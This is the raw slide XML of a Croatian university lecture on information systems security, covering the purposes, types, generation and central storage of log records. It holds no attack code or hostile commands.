              <a:t>5/13/2025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BBA81F-1E85-4FB2-AB23-04749C1F2654}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4029906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263566D-62C0-4832-9D64-6275C4665AE6}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/13/2025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D9191E-C034-448A-83A9-36F1A78CC22C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2392917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C5A47C9-5F07-4792-AB75-328DB38FA52C}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/13/2025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9B8338E-DE80-4218-8A7D-B7425776C68E}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4856596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BEA5CBE-F63E-48BC-BE42-1D56968F43D9}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/13/2025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D36F978-555A-4CC5-B392-7C62FF103DDD}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2720270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521DE7-99E1-445B-9EC8-43BC3053CAA3}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/13/2025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281733-42A2-491D-A35D-816100A65180}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3829322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7E7CB-9289-4957-97AA-6BA3A1781318}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/13/2025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C0EAAC-07B3-430E-8896-6AF8BF058638}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1759507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4826288-3B12-4D4C-ADAB-06F7AAD19871}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/13/2025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A571BF-3FD1-4B76-B335-F9B4C09C5163}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1309619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CFB7C8B-B926-4B46-9362-52FC1211F14F}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/13/2025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3D6194-3910-4BFE-B503-59286DB66FBF}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="92918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29283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3F160F-5441-4CD2-B8EF-C978991689B0}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/13/2025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CB71C5-B6EA-47CB-AF01-FB2EFE1D8E8B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="110739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7976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8032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758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5/13/2025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394691" y="1600200"/>
            <a:ext cx="4371976" cy="5486401"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657601" y="728663"/>
            <a:ext cx="4857749"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19662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5/13/2025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4039" y="3904458"/>
            <a:ext cx="4516636"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60102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04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238960"/>
            <a:ext cx="8948901" cy="619041"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3404991012"/>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 id="2147484487" r:id="rId13"/>
    <p:sldLayoutId id="2147484488" r:id="rId14"/>
    <p:sldLayoutId id="2147484489" r:id="rId15"/>
    <p:sldLayoutId id="2147484490" r:id="rId16"/>
  </p:sldLayoutIdLst>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Click to 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6C4B19C-F62F-493E-A6F8-2A031174385E}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/13/2025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5F3E417-00FE-4625-8718-131EE1A2A6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hyperlink" Target="https://media.defense.gov/2022/May/17/2002998718/-1/-1/0/CSA_WEAK_SECURITY_CONTROLS_PRACTICES_EXPLOITED_FOR_INITIAL_ACCESS.PDF" TargetMode="Externa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C1F5-046A-B7E3-CD3F-BABA7FC5740D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5109540" y="3026618"/>
            <a:ext cx="3910830" cy="13086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5400" b="1" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" defTabSz="685800" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" sz="2400" dirty="0"/>
              <a:t>Sigurnost informacijskih sustava</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C30E60"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TekstniOkvir 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE719752-2A6F-EE53-14D3-001B3E974130}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4934590" y="4615154"/>
            <a:ext cx="4085780" cy="415498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="hr-HR" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C30E60"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mr.sc. Dražen Pranić</a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" sz="2100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="406597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hr-HR" dirty="0"/>
              <a:t>Prikupljanje log zapisa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26626" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>logovi imaju širu primjenu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rekonstrukcij</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" altLang="sr-Latn-RS" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>događaja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>što se dogodilo, kako,…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>identifikaciju problema (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Zašto ovaj upit troši resurse?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utvrđivanje odgovornosti za aktivnosti ostvarene na informacijskom sustavu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tko je kriv?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>otkrivanje sumnjivih aktivnosti (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tko je kriv?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>forenzika (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kako su ušli u sustav?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="sr-Latn-RS" dirty="0">
              <a:solidFill>
                <a:srgbClr val="262626"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="322051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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Što sve čini log zapise?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="sr-Latn-RS" dirty="0">
              <a:solidFill>
                <a:srgbClr val="262626"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27650" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Operativni i sistemski zapisi jesu bilješke o aktivnostima na resursima informacijskog sustava nastale onim slijedom kako su se te aktivnosti ostvarivale </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sistemski zapisi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zapisi operacijskih sustava, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vatrozida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usmjernika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>antivirusa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Start/stop, greške u sustavu i sl.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jednostavno podešavanje</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Audit zapisi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Korisničke aktivnosti (prijava/odjava, pristup datotekama i sl.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Zahtjeva planiranje prilikom podešavanja</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zapisi od bilo kud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
              <a:solidFill>
                <a:srgbClr val="262626"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4109782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rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS"/>
              <a:t>Generiranje i slanje log zapisa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="sr-Latn-RS"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22531" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Osnovni zahtjev pred operacijske sustave, aplikacije i uređaje</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Određeni log zapisi standardizirani, još uvijek velik broj nestandardiziranih log zapisa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Nekonzistentnost između proizvođača</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Npr. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0" err="1"/>
              <a:t>autentikacijski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t> log na Windowsima je drukčiji od onog na Linuxu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Potrebna normalizacija prije pohranjivanja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rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Pohranjivanje log zapisa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="sr-Latn-RS" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33794" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Odnosi se na metodu pohranjivanja na jednom ili više centralnih poslužitelja</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Klasično se logovi pohranjuju u tekstualne datoteke</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Na Windowsima Event Log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
